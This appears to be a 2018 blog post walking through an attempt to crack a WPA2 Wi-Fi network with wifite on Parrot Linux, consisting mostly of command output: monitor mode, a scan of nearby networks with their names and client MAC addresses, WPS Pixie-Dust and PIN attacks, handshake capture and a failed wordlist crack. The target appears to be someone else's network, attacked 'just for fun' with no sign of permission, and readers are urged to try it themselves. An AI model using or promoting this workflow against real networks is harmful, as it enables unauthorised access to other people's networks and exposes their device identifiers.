Posted: 25 September 2018. At: 12:39 PM. This was 6 years ago. Post ID: 12482
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Trying to crack WPA2 WIFI.

I was trying to crack a WPA2 WIFI network just for fun. I managed to capture a handshake, but the password was not in the wordlist. but I now have a valid handshake that I can try and crack later on.

This is the whole process. I started wifite with the –kill parameter to stop Network Manager before the scan started, this can conflict with the whole setup process.

└──╼ #wifite --kill
   .               .    
 .´  ·  .     .  ·  `.  wifite 2.2.5
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´
   `     /¯¯¯\     ´    
 [+] option: kill conflicting processes enabled
 [!] Warning: Recommended app hcxdumptool was not found. install @
 [!] Warning: Recommended app hcxpcaptool was not found. install @
 [!] Killing 2 conflicting processes
 [!] Terminating conflicting process wpa_supplicant (PID 1280)
 [!] stopping network-manager (service network-manager stop)
    Interface   PHY   Driver              Chipset                                                                               
 1. wlan0       phy0  ath9k               Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
 2. wlan1       phy2  rt73usb             Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W]
 [+] Select wireless interface (1-2): 2
 [+] enabling monitor mode on wlan1... enabled wlan1mon
   NUM                      ESSID   CH  ENCR  POWER  WPS?  CLIENT                                                               
   ---  -------------------------  ---  ----  -----  ----  ------
     1              OPTUS_B8E926     1   WPA   24db   yes    1                                                                  
     2             Telstra962013    10   WPA   19db    no                                                                       
     3             TelstraD22F23    11   WPA   19db    no                                                                       
     4       (5C:A8:6A:12:78:28)     6   WPA   17db    no                                                                       
     5             Telstra13AF29     5   WPA   15db    no                                                                       
 [+] select target(s) (1-5) separated by commas, dashes or all: 1

The scan has completed. Now I have captured a handshake file containing the WPA2 PSK. This is very important, now I could attack this file offline and try to find what PSK it is.

 [+] (1/1) Starting attacks against F4:6B:EF:B8:E9:27 (OPTUS_B8E926)
 [+] OPTUS_B8E926 (29db) WPS Pixie-Dust: [--1s] Failed: Timeout after 300 seconds                                                [+] OPTUS_B8E926 (27db) WPS PIN Attack: [19m11s PINs:1] Failed: Too many timeouts (100)                                        
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcaptool
 [+] OPTUS_B8E926 (23db) WPA Handshake capture: Discovered new client: E0:E5:CF:60:96:10                                        
 [+] OPTUS_B8E926 (86db) WPA Handshake capture: Discovered new client: F0:C7:7F:78:19:D5                                        
 [+] OPTUS_B8E926 (86db) WPA Handshake capture: Discovered new client: DC:9B:9C:A0:DB:14                                        
 [+] OPTUS_B8E926 (27db) WPA Handshake capture: Discovered new client: 74:29:AF:B1:AA:C3                                        
 [+] OPTUS_B8E926 (20db) WPA Handshake capture: Captured handshake                                                              
 [+] saving copy of handshake to hs/handshake_OPTUSB8E926_F4-6B-EF-B8-E9-27_2018-09-25T01-36-44.cap saved
 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for f4:6b:ef:b8:e9:27
 [!]    pyrit: .cap file does not contain a valid handshake
 [+] cowpatty: .cap file contains a valid handshake for (OPTUS_B8E926)
 [+] aircrack: .cap file contains a valid handshake for F4:6B:EF:B8:E9:27
 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-top4800-probable.txt wordlist
 [+] Cracking WPA Handshake: 93.19% ETA: 0s @ 2236.3kps (current key: connected)                                                
 [!] Failed to crack handshake: wordlist-top4800-probable.txt did not contain password
 [+] Finished attacking 1 target(s), exiting
 [!] Note: Leaving interface in Monitor Mode!
 [!] To disable Monitor Mode when finished: airmon-ng stop wlan1mon
 [!] You can restart NetworkManager when finished (service network-manager start)
└──╼ #airmon-ng stop wlan1mon
PHY	Interface	Driver		Chipset
phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy2	wlan1mon	rt73usb		Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W]
		(mac80211 station mode vif enabled on [phy2]wlan1)
		(mac80211 monitor mode vif disabled for [phy2]wlan1mon)

This was a productive exercise. Even though the WPS Pixie attack did not work, I still have a good handshake file. That is the main thing. I am posting this in case it helps someone out who is trying the same thing and needs help to get started using Parrot Linux.

Trying to crack a WPA2 network with Wifite.
Trying to crack a WPA2 network with Wifite.

So fire up Parrot and see what you can do with it!

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